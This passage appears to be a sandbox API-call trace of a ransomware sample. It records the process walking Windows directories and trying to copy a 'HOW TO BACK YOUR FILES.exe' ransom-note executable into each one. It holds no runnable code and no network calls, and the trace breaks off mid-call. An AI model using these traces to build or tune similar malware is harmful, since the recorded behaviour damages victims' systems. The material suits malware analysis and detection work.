ftLastAccessTime.dwLowDateTime=0x5a47a0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5a47a0a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.000] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.000] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.001] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Accessories\\Windows PowerShell", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Accessories\\Windows PowerShell") returned="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Accessories\\Windows PowerShell" [0090.001] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0090.001] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7808 | out: hHeap=0x2b0000) returned 1 [0090.001] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Accessories\\Windows PowerShell") returned 86 [0090.001] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Accessories\\Windows PowerShell" | out: lpString1="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Accessories\\Windows PowerShell") returned="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Accessories\\Windows PowerShell" [0090.001] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.001] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\start menu\\programs\\accessories\\windows powershell\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.001] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.002] GetLastError () returned 0x0 [0090.002] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.002] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.002] CloseHandle (hObject=0x120) returned 1 [0090.002] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.002] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.002] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5a512620, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5a512620, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.002] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.002] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.002] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Accessories\\Tablet PC", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Accessories\\Tablet PC") returned="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Accessories\\Tablet PC" [0090.002] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d7700 | out: hHeap=0x2b0000) returned 1 [0090.002] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0090.002] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Accessories\\Tablet PC") returned 77 [0090.002] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Accessories\\Tablet PC" | out: lpString1="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Accessories\\Tablet PC") returned="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Accessories\\Tablet PC" [0090.002] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.002] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Accessories\\Tablet PC\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\start menu\\programs\\accessories\\tablet pc\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.003] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.003] GetLastError () returned 0x0 [0090.003] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.003] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.003] CloseHandle (hObject=0x120) returned 1 [0090.003] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.003] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.003] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Accessories\\Tablet PC\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x5a55e8e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5a55e8e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.003] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.004] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.004] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Accessories\\System Tools", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Accessories\\System Tools") returned="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Accessories\\System Tools" [0090.004] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e27c0 | out: hHeap=0x2b0000) returned 1 [0090.004] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0090.004] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Accessories\\System Tools") returned 80 [0090.004] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Accessories\\System Tools" | out: lpString1="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Accessories\\System Tools") returned="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Accessories\\System Tools" [0090.004] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.004] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Accessories\\System Tools\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\start menu\\programs\\accessories\\system tools\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.004] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.005] GetLastError () returned 0x0 [0090.005] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.005] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.005] CloseHandle (hObject=0x120) returned 1 [0090.005] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.005] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.005] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Accessories\\System Tools\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9dbcac, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5a61cfc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5a61cfc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.005] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.005] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.005] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Accessories\\Accessibility", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Accessories\\Accessibility") returned="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Accessories\\Accessibility" [0090.005] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2710 | out: hHeap=0x2b0000) returned 1 [0090.005] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0090.005] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Accessories\\Accessibility") returned 81 [0090.005] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Accessories\\Accessibility" | out: lpString1="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Accessories\\Accessibility") returned="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Accessories\\Accessibility" [0090.005] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.005] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Accessories\\Accessibility\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\start menu\\programs\\accessories\\accessibility\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.006] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.006] GetLastError () returned 0x0 [0090.006] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.006] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.006] CloseHandle (hObject=0x120) returned 1 [0090.006] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.006] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.006] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Accessories\\Accessibility\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9dbcac, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5a643120, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5a643120, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.007] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.007] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.007] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache") returned="C:\\Users\\All Users\\Application Data\\Package Cache" [0090.007] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4780 | out: hHeap=0x2b0000) returned 1 [0090.007] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7bc8 | out: hHeap=0x2b0000) returned 1 [0090.007] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Package Cache") returned 49 [0090.007] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache") returned="C:\\Users\\All Users\\Application Data\\Package Cache" [0090.007] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.007] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.007] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.008] GetLastError () returned 0x0 [0090.008] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.008] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.008] CloseHandle (hObject=0x120) returned 1 [0090.008] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.008] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.008] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecce51e0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4bc17ce0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bc17ce0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.008] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.008] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.008] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005" [0090.008] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cc830 | out: hHeap=0x2b0000) returned 1 [0090.008] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7be8 | out: hHeap=0x2b0000) returned 1 [0090.008] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005") returned 99 [0090.008] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005" [0090.008] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.009] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.009] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.009] GetLastError () returned 0x0 [0090.009] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.009] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.009] CloseHandle (hObject=0x120) returned 1 [0090.009] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.009] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.010] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4bc17ce0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bc17ce0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.010] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.010] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.010] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages" [0090.010] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f4fc8 | out: hHeap=0x2b0000) returned 1 [0090.010] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7be8 | out: hHeap=0x2b0000) returned 1 [0090.010] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages") returned 108 [0090.010] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages" [0090.010] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.010] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.011] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.011] GetLastError () returned 0x0 [0090.011] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.011] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.011] CloseHandle (hObject=0x120) returned 1 [0090.011] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.011] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.011] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4bc3de40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bc3de40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.011] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.011] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.011] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86" [0090.011] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cc830 | out: hHeap=0x2b0000) returned 1 [0090.011] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7be8 | out: hHeap=0x2b0000) returned 1 [0090.011] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86") returned 132 [0090.011] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86" [0090.012] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.012] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.012] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, 